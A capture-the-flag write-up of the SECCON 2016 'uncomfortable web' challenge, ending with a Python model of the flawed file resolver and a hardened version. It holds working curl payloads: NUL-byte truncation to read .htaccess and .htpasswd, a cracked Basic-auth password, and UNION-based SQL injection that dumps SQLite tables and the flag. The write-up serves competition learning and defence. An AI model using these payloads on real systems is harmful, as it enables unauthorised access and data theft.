uncomfortable web
===

## Challenge overview

### Genre

Web

### Points

300 points

### Description

uncomfortable web

Attack to http://127.0.0.1:81/authed/ through the uploaded script at http://uncomfortableweb.pwn.seccon.jp/. Get the flag in the database!

### Flag

`SECCON{I want to eventually make a CGC web edition... someday...}`

### Solvers

mzyy94
ww24

## Solution

Whatever string follows `http://127.0.0.1:81/select.cgi?txt=` gets `.txt` appended, and the resulting file comes back as the response.
To make the server ignore the `.txt` it appends, we truncate the string with a NUL byte (`%00`).

```bash
#!/bin/sh
curl "http://127.0.0.1:81/select.cgi?txt=.htaccess%00%00"
curl "http://127.0.0.1:81/select.cgi?txt=.htpasswd%00%00"
```

#### .htaccess

```htmlmixed
<html>
<body>
<form action="?" method="get">
<select name="txt">
<option value="a">a</option>
<option value="b">b</option>
</select>
<input type="submit" vaue="GO">
</form>
<hr>
AuthUserFile /var/www/html-inner/authed/.htpasswd<br>
AuthGroupFile /dev/null<br>
AuthName &quot;SECCON 2016&quot;<br>
AuthType Basic<br>
Require user keigo<br>
</body></html>
```

#### .htpasswd

```html
<html>
<body>
<form action="?" method="get">
<select name="txt">
<option value="a">a</option>
<option value="b">b</option>
</select>
<input type="submit" vaue="GO">
</form>
<hr>
keigo:LdnoMJCeVy.SE<br>
</body></html>
```

Cracking the hash in this htpasswd gives `keigo:test`, so we authenticate with Basic auth.
That reveals 100 CGI files.

```bash
#!/bin/sh
for i in $(seq 1 100); do
  curl -u keigo:test "http://127.0.0.1:81/authed/sqlinj/$i.cgi?no=4822267938" 2> /dev/null
done
```

The `no=` parameter appears to be SQL-injectable.
`72.cgi` looks suspicious.

```
> GET /authed/sqlinj/72.cgi?no=4822267938'+OR+'1'='1 HTTP/1.1
> Authorization: Basic a2VpZ286dGVzdA==
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.21 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2
> Host: 127.0.0.1:81
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sat, 10 Dec 2016 15:29:22 GMT
< Server: Apache
< Connection: close
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=utf-8
<
{ [data not shown]
* Closing connection #0
<html>
<head>
<title>SECCON 2016 Online</title>
<!-- by KeigoYAMAZAKI, 2016.11.08- -->
</head>
<body>
<a href="?no=4822267938">link</a>
<hr>
ISBN-10: 4822267865<br>
ISBN-13: 978-4822267865<br>
PUBLISH: 2015/2/20<p>
ISBN-10: 4822267911<br>
ISBN-13: 978-4822267919<br>
PUBLISH: 2015/8/27<p>
ISBN-10: 4822267938<br>
ISBN-13: 978-4822267933<br>
PUBLISH: 2016/2/19<p>
ISBN-10: 4822237842<br>
ISBN-13: 978-4822237844<br>
PUBLISH: 2016/8/25<p>
</body></html>
```

The RDBMS is SQLite 3.6.20.

```bash
curl -svu keigo:test "http://127.0.0.1:81/authed/sqlinj/72.cgi?no='OR'1'+UNION+SELECT+'a','b',sqlite_version()--"
```

First, list the tables.

```
curl -u keigo:test "http://127.0.0.1:81/authed/sqlinj/72.cgi?no='OR+1=1+UNION+SELECT+type,name,sql+FROM+sqlite_master+WHERE+type='table'--" 2>/dev/null
```

```htmlmixed
<html>
<head>
<title>SECCON 2016 Online</title>
<!-- by KeigoYAMAZAKI, 2016.11.08- -->
</head>
<body>
<a href="?no=4822267938">link</a>
<hr>
ISBN-10: 4822237842<br>
ISBN-13: 978-4822237844<br>
PUBLISH: 2016/8/25<p>
ISBN-10: 4822267865<br>
ISBN-13: 978-4822267865<br>
PUBLISH: 2015/2/20<p>
ISBN-10: 4822267911<br>
ISBN-13: 978-4822267919<br>
PUBLISH: 2015/8/27<p>
ISBN-10: 4822267938<br>
ISBN-13: 978-4822267933<br>
PUBLISH: 2016/2/19<p>
ISBN-10: table<br>
ISBN-13: books<br>
PUBLISH: CREATE TABLE books (isbn10,isbn13,date)<p>
ISBN-10: table<br>
ISBN-13: f1ags<br>
PUBLISH: CREATE TABLE f1ags (f1ag)<p>
</body></html>
```

Got the flag.

```
curl -u keigo:test "http://127.0.0.1:81/authed/sqlinj/72.cgi?no='OR+1=1+UNION+SELECT+f1ag,f1ag,f1ag+FROM+f1ags--" 2>/dev/null
```

```htmlmixed
<html>
<head>
<title>SECCON 2016 Online</title>
<!-- by KeigoYAMAZAKI, 2016.11.08- -->
</head>
<body>
<a href="?no=4822267938">link</a>
<hr>
ISBN-10: 4822237842<br>
ISBN-13: 978-4822237844<br>
PUBLISH: 2016/8/25<p>
ISBN-10: 4822267865<br>
ISBN-13: 978-4822267865<br>
PUBLISH: 2015/2/20<p>
ISBN-10: 4822267911<br>
ISBN-13: 978-4822267919<br>
PUBLISH: 2015/8/27<p>
ISBN-10: 4822267938<br>
ISBN-13: 978-4822267933<br>
PUBLISH: 2016/2/19<p>
ISBN-10: SECCON{I want to eventually make a CGC web edition... someday...}<br>
ISBN-13: SECCON{I want to eventually make a CGC web edition... someday...}<br>
PUBLISH: SECCON{I want to eventually make a CGC web edition... someday...}<p>
</body></html>
```

## Discussion

URLs that are reachable, for a start:

```bash
#!/bin/bash
curl "http://127.0.0.1:81/select.cgi?txt=a"             # a.txt
curl "http://127.0.0.1:81/select.cgi?txt=b"             # b.txt
curl "http://127.0.0.1:81/select.cgi?txt=c"             # c.txt
curl "http://127.0.0.1:81/select.cgi?txt=a;hogehoge"    # a.txt
curl "http://127.0.0.1:81/select.cgi?txt=..//././a"     # a.txt
curl "http://127.0.0.1:81/select.cgi?txt=/hoge/a;fuga"  # a.txt
```

It looks like the server takes the string after the last `/` and up to the first `;`, appends `.txt`, and reads that as the file.

If only we could fetch /authed/index.cgi...

![execution restriction](https://i.imgur.com/WgvgYQW.png)

`http://127.0.0.1:81/authed/a.txt` returns 401:

```
< HTTP/1.1 401 Authorization Required
< Date: Sat, 10 Dec 2016 14:30:51 GMT
< Server: Apache
< WWW-Authenticate: Basic realm="SECCON 2016"
< Content-Length: 460
< Connection: close
< Content-Type: text/html; charset=iso-8859-1
```
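To make the inferred behaviour of `select.cgi` concrete, here is an added Python model (not the challenge's real source, which the write-up never saw) of the resolution rule observed above, including the NUL truncation that discards the appended `.txt`, beside a hardened version that rejects NUL bytes, allow-lists the form's values and confines the path. The allow-list `{a, b, c}` and the base directory are assumptions.

```python
import os
from urllib.parse import unquote

# Model of the file-selection rule inferred in the write-up (constructed,
# not the challenge's code): keep what follows the last "/", drop everything
# from ";" on, append ".txt". A C-level open() then stops at the first NUL,
# which is why "%00" makes the server ignore the suffix it just appended.
def resolve_vulnerable(txt_param: str) -> str:
    txt = unquote(txt_param)              # CGI decodes %00 into a NUL byte
    name = txt.rsplit("/", 1)[-1]         # keep text after the last "/"
    name = name.split(";", 1)[0]          # cut at the first ";"
    filename = name + ".txt"
    return filename.split("\x00", 1)[0]   # emulate C-string NUL truncation

# Hardened counterpart. Assumptions: the form only offers a, b and c, and the
# .txt files live under BASE_DIR (directory chosen for illustration).
ALLOWED = {"a", "b", "c"}
BASE_DIR = "/var/www/html-inner/txt"

def resolve_hardened(txt_param: str, base_dir: str = BASE_DIR) -> str:
    txt = unquote(txt_param)
    if "\x00" in txt:
        raise ValueError("NUL byte in parameter")
    if txt not in ALLOWED:
        raise ValueError("value not in allow-list")
    root = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(root, txt + ".txt"))
    # Defence in depth: even a mistaken allow-list must not escape base_dir.
    if os.path.commonpath([path, root]) != root:
        raise ValueError("path escapes base directory")
    return path

def is_rejected(txt_param: str) -> bool:
    """True when the hardened resolver refuses the parameter."""
    try:
        resolve_hardened(txt_param)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    # The probe values from the write-up, run through both resolvers.
    for p in ("a", "a;hogehoge", "..//././a", "/hoge/a;fuga", ".htaccess%00%00"):
        print(f"{p!r:22} vulnerable -> {resolve_vulnerable(p)!r:14} "
              f"hardened rejects: {is_rejected(p)}")
```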